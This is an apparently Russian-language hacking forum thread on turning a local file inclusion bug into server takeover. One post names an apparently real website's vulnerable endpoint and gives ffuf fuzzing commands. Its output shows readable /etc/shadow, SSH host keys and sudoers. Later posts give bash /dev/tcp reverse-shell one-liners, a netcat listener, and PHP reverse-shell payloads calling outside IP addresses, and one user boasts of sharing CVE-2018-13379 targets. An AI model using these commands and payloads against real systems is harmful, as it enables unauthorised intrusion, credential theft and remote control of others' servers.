LFI помощь новичку

[Ott_Fon_Bismark]

Приветствую, еть лфи , доступа к логам в стандартной папке нет, есть доступ к логам пхп ,но оно обрезает пхп код, что не удивительно, интересует нестандартный способ расскрутки , ссх и прочее пытался найти но именно к ключам доступа нет, файлы пхп с сервера читать не могу пробывал врапперы, если у кого есть дельный совет, было бы кстати, буду очень благодарен.

 

[simpleteaseller]

Solving "includer's revenge" from hxp ctf 2021 without controlling any files

Solving "includer's revenge" from hxp ctf 2021 without controlling any files - writeup.md

gist.github.com

 

[MOYAGOLUBUSHKA]

Приветствую, еть лфи , доступа к логам в стандартной папке нет, есть доступ к логам пхп ,но оно обрезает пхп код, что не удивительно, интересует нестандартный способ расскрутки , ссх и прочее пытался найти но именно к ключам доступа нет, файлы пхп с сервера читать не могу пробывал врапперы, если у кого есть дельный совет, было бы кстати, буду очень благодарен.

не очень понимаю что значит обрезает?

типа даешь место файла он его кидает обратно но только первее X строк ?

а File upload типа нет ?

что нащет почитать интиресные файлы типа истории юзеров или историю SQL ?
/proc/self/net/tcp
/proc/self/net/arp
/etc/passwd

вдруг там чтото еще бежит

кстати вот еще пример похожего на то что simpleteaseller показал

Remote Code Execution With LFI | C:\Helich0pper

My Rating: Easy Operating System: Linux Overview We will execute arbitrary commands and even gain remote shell access using nothing but Local File Inclusion ...

helich0pper.github.io

 

[Ott_Fon_Bismark]

не очень понимаю что значит обрезает?

типа даешь место файла он его кидает обратно но только первее X строк ?

а File upload типа нет ?

что нащет почитать интиресные файлы типа истории юзеров или историю SQL ?
/proc/self/net/tcp
/proc/self/net/arp
/etc/passwd

вдруг там чтото еще бежит

кстати вот еще пример похожего на то что simpleteaseller показал

Remote Code Execution With LFI | C:\Helich0pper

My Rating: Easy Operating System: Linux Overview We will execute arbitrary commands and even gain remote shell access using nothing but Local File Inclusion ...

helich0pper.github.io

я в плане лог поизонинга что образает нагрузку пхп, в логах пхп, т.к. к другим логам нет доступа тот же апач лежит как то нестандартно как и другие службы , все что можно по словарям я профузил ничего особо интересного не нашел для росскрута, вот и поинтересовался, может кто то шарит как это еще можно кроме лог пойзонинга крутануть.

 

[Prokhorenco]

Im lazy so i like to automate as much as possible before manually playing around with a vuln.

LFI:

I find LFI on this endpoint:

http://nevebinyan.co.il:3000/i3geo/exemplos/codemirror.php?pagina=../../../../../../../../../../../../../../../../../etc/passwd

I quickly test for different files to pull down fuzzing the endpoint with ffuf and LFI payload word lists:

ffuf -w LFI-gracefulsecurity-linux.txt -u "http://nevebinyan.co.il:3000/i3geo/exemplos/codemirror.php?pagina=../../../../../../../../../../../../../../../../../FUZZ"

Try different word lists for more results during testing.

I also advise fuzzing after users and other points of interest:

ffuf -w LFI-Jhaddix.txt -u "http://nevebinyan.co.il:3000/i3geo/exemplos/codemirror.php?pagina=../../../../../../../../../../../../../../../../../root/FUZZ"

Results:

        /'___\  /'___\           /'___\     
       /\ \__/ /\ \__/  __  __  /\ \__/     
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\   
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/   
         \ \_\   \ \_\  \ \____/  \ \_\     
          \/_/    \/_/   \/___/    \/_/     

       v1.1.0
________________________________________________

 :: Method           : GET
 :: URL              : http://nevebinyan.co.il:3000/i3geo/exemplos/codemirror.php?pagina=../../../../../../../../../../../../../../../../../root/FUZZ
 :: Wordlist         : FUZZ: LFI-Jhaddix.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________
/.ssh/authorized_keys

Results of fuzz:

user@host:/tmp# ffuf -w LFI-gracefulsecurity-linux.txt -u "http://nevebinyan.co.il:3000/i3geo/exemplos/codemirror.php?pagina=../../../../../../../../../../../../../../../../../FUZZ"

        /'___\  /'___\           /'___\    
       /\ \__/ /\ \__/  __  __  /\ \__/    
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\  
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/  
         \ \_\   \ \_\  \ \____/  \ \_\    
          \/_/    \/_/   \/___/    \/_/    

       v1.1.0
________________________________________________

 :: Method           : GET
 :: URL              : http://nevebinyan.co.il:3000/i3geo/exemplos/codemirror.php?pagina=../../../../../../../../../../../../../../../../../FUZZ
 :: Wordlist         : FUZZ: LFI-gracefulsecurity-linux.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

/etc/hosts.deny         [Status: 200, Size: 711, Words: 128, Lines: 18]
/etc/at.deny            [Status: 200, Size: 144, Words: 1, Lines: 25]
/etc/crontab            [Status: 200, Size: 1042, Words: 181, Lines: 23]
/etc/fstab              [Status: 200, Size: 82, Words: 4, Lines: 3]
/etc/issue              [Status: 200, Size: 26, Words: 5, Lines: 3]
/etc/shadow             [Status: 200, Size: 921, Words: 1, Lines: 34]
/etc/hosts.allow        [Status: 200, Size: 411, Words: 82, Lines: 11]
/etc/lsb-release        [Status: 200, Size: 104, Words: 3, Lines: 5]
/etc/hosts              [Status: 200, Size: 609, Words: 73, Lines: 19]
/etc/passwd             [Status: 200, Size: 1765, Words: 15, Lines: 34]
/etc/network/interfaces [Status: 200, Size: 240, Words: 30, Lines: 9]
/etc/mtab               [Status: 200, Size: 0, Words: 1, Lines: 1]
/etc/networks           [Status: 200, Size: 91, Words: 11, Lines: 3]
/etc/ssh/ssh_config     [Status: 200, Size: 1603, Words: 245, Lines: 53]
/etc/ssh/ssh_host_dsa_key [Status: 200, Size: 1381, Words: 7, Lines: 22]
/etc/ssh/sshd_config    [Status: 200, Size: 3257, Words: 294, Lines: 124]
/etc/profile            [Status: 200, Size: 581, Words: 145, Lines: 28]
/etc/ssh/ssh_host_dsa_key.pub [Status: 200, Size: 605, Words: 3, Lines: 2]
/etc/resolv.conf        [Status: 200, Size: 708, Words: 97, Lines: 19]
/proc/meminfo           [Status: 200, Size: 0, Words: 1, Lines: 1]
/proc/modules           [Status: 200, Size: 0, Words: 1, Lines: 1]
/proc/version           [Status: 200, Size: 0, Words: 1, Lines: 1]
/proc/cpuinfo           [Status: 200, Size: 0, Words: 1, Lines: 1]
/proc/filesystems       [Status: 200, Size: 0, Words: 1, Lines: 1]
/proc/interrupts        [Status: 200, Size: 0, Words: 1, Lines: 1]
/proc/mounts            [Status: 200, Size: 0, Words: 1, Lines: 1]
/proc/ioports           [Status: 200, Size: 0, Words: 1, Lines: 1]
/proc/stat              [Status: 200, Size: 0, Words: 1, Lines: 1]
/proc/self/net/arp      [Status: 200, Size: 0, Words: 1, Lines: 1]
/proc/swaps             [Status: 200, Size: 0, Words: 1, Lines: 1]
/var/log/auth.log       [Status: 200, Size: 9483178, Words: 0, Lines: 0]
/var/log/kern.log       [Status: 200, Size: 0, Words: 1, Lines: 1]
/var/log/dpkg.log       [Status: 200, Size: 30379, Words: 1941, Lines: 397]
/var/log/wtmp           [Status: 200, Size: 12666, Words: 3, Lines: 3]
/var/run/utmp           [Status: 200, Size: 2303, Words: 1, Lines: 1]
/var/log/dmesg          [Status: 200, Size: 129625, Words: 11845, Lines: 985]
/etc/adduser.conf       [Status: 200, Size: 3028, Words: 402, Lines: 89]
/etc/bash.bashrc        [Status: 200, Size: 2319, Words: 399, Lines: 72]
/etc/ca-certificates.conf.dpkg-old [Status: 200, Size: 6820, Words: 64, Lines: 168]
/etc/crypttab           [Status: 200, Size: 54, Words: 5, Lines: 2]
/etc/debian_version     [Status: 200, Size: 13, Words: 1, Lines: 2]
/etc/default/grub       [Status: 200, Size: 1209, Words: 142, Lines: 34]
/etc/deluser.conf       [Status: 200, Size: 604, Words: 86, Lines: 21]
/etc/dhcp/dhclient.conf [Status: 200, Size: 1735, Words: 168, Lines: 55]
/var/log/lastlog        [Status: 200, Size: 291708, Words: 2, Lines: 1]
/etc/ca-certificates.conf [Status: 200, Size: 7541, Words: 64, Lines: 187]
/etc/debconf.conf       [Status: 200, Size: 2969, Words: 411, Lines: 84]
/etc/hdparm.conf        [Status: 200, Size: 5060, Words: 757, Lines: 143]
/etc/host.conf          [Status: 200, Size: 92, Words: 16, Lines: 4]
/etc/group              [Status: 200, Size: 780, Words: 1, Lines: 60]
/etc/fuse.conf          [Status: 200, Size: 280, Words: 38, Lines: 9]
/etc/hostname           [Status: 200, Size: 11, Words: 1, Lines: 2]
/etc/group-             [Status: 200, Size: 765, Words: 1, Lines: 59]
/etc/kernel-img.conf    [Status: 200, Size: 110, Words: 13, Lines: 5]
/etc/ld.so.conf         [Status: 200, Size: 34, Words: 2, Lines: 3]
/etc/issue.net          [Status: 200, Size: 19, Words: 3, Lines: 2]
/etc/login.defs         [Status: 200, Size: 10550, Words: 1638, Lines: 342]
/etc/logrotate.conf     [Status: 200, Size: 533, Words: 77, Lines: 25]
/etc/manpath.config     [Status: 200, Size: 5215, Words: 530, Lines: 133]
/etc/ldap/ldap.conf     [Status: 200, Size: 332, Words: 23, Lines: 18]
/etc/nginx/nginx.conf   [Status: 200, Size: 1490, Words: 117, Lines: 86]
/etc/nginx/sites-available/default [Status: 200, Size: 4129, Words: 465, Lines: 154]
/etc/modules            [Status: 200, Size: 195, Words: 33, Lines: 6]
/etc/passwd-            [Status: 200, Size: 1711, Words: 15, Lines: 33]
/etc/pam.conf           [Status: 200, Size: 552, Words: 65, Lines: 16]
/etc/os-release         [Status: 200, Size: 382, Words: 6, Lines: 13]
/etc/security/access.conf [Status: 200, Size: 4564, Words: 635, Lines: 123]
/etc/ltrace.conf        [Status: 200, Size: 14867, Words: 1011, Lines: 544]
/etc/security/group.conf [Status: 200, Size: 3635, Words: 690, Lines: 107]
/etc/security/limits.conf [Status: 200, Size: 2161, Words: 747, Lines: 57]
/etc/security/opasswd   [Status: 200, Size: 0, Words: 1, Lines: 1]
/etc/security/sepermit.conf [Status: 200, Size: 419, Words: 106, Lines: 12]
/etc/security/time.conf [Status: 200, Size: 2179, Words: 342, Lines: 66]
/etc/security/pam_env.conf [Status: 200, Size: 2972, Words: 429, Lines: 74]
/etc/shadow-            [Status: 200, Size: 921, Words: 1, Lines: 34]
/etc/sensors3.conf      [Status: 200, Size: 10593, Words: 2648, Lines: 537]
/etc/security/namespace.conf [Status: 200, Size: 1440, Words: 219, Lines: 29]
/etc/sudoers            [Status: 200, Size: 755, Words: 81, Lines: 31]
/etc/timezone           [Status: 200, Size: 8, Words: 1, Lines: 2]
/etc/sysctl.d/10-console-messages.conf [Status: 200, Size: 77, Words: 13, Lines: 4]
/etc/sysctl.conf        [Status: 200, Size: 2351, Words: 250, Lines: 69]
/etc/sysctl.d/10-network-security.conf [Status: 200, Size: 158, Words: 14, Lines: 7]
/proc/net/udp           [Status: 200, Size: 0, Words: 1, Lines: 1]
/proc/self/cmdline      [Status: 200, Size: 0, Words: 1, Lines: 1]
/proc/self/environ      [Status: 200, Size: 0, Words: 1, Lines: 1]
/proc/devices           [Status: 200, Size: 0, Words: 1, Lines: 1]
/proc/net/tcp           [Status: 200, Size: 0, Words: 1, Lines: 1]
/proc/self/stat         [Status: 200, Size: 0, Words: 1, Lines: 1]
/proc/self/status       [Status: 200, Size: 0, Words: 1, Lines: 1]
/proc/self/mounts       [Status: 200, Size: 0, Words: 1, Lines: 1]
/usr/share/adduser/adduser.conf [Status: 200, Size: 3028, Words: 402, Lines: 89]
/var/log/kern.log.1     [Status: 200, Size: 5403, Words: 386, Lines: 22]
/var/log/nginx/error.log [Status: 200, Size: 5694, Words: 462, Lines: 28]
/var/log/syslog         [Status: 200, Size: 7662, Words: 865, Lines: 75]
/var/log/syslog.1       [Status: 200, Size: 15111, Words: 1643, Lines: 147]
/var/log/nginx/access.log [Status: 200, Size: 1245623, Words: 109767, Lines: 5354]

 

[Sec13B]

Don`t lose your time with LFI (local file inclusion)

This is a local file inclusion... you can do nothing with LFI ,

cant be exploring , like:
remote$ /bin/bash -i &> /dev/tcp/192.168.1.1/80 0>&1
remote$ /bin/bash -c 'exec bash -i &> /dev/tcp/192.168.1.1/80 <&1'
local$ nc -nvlp 80

 

[Prokhorenco]

Don`t lose your time with LFI (local file inclusion)

This is a local file inclusion... you can do nothing with LFI ,

cant be exploring , like:
remote$ /bin/bash -i &> /dev/tcp/192.168.1.1/80 0>&1
remote$ /bin/bash -c 'exec bash -i &> /dev/tcp/192.168.1.1/80 <&1'
local$ nc -nvlp 80

It is fine to not have the skills or knowledge on how to exploit LFI but id advise against spreading misinformation just because you lack the skills to exploit LFI.

OWASP LFI: https://owasp.org/www-project-web-s...Testing/11.1-Testing_for_Local_File_Inclusion
HackTricks: https://book.hacktricks.xyz/pentesting-web/file-inclusion

Dont let your lack of knowledge and skills make you look foolish I've given you CVE-2018-13379 vulns before, what do you think this vuln type is called

 

[Sec13B]

Stop bragging. Prokhorenco . show me your skills and knowledge how you get shell from the local file inclusion, i am sure you can do nothing with LFI.

<?php $sock=fsockopen("10.0.0.1",1234);$proc=proc_open("/bin/sh -i",array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>

<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>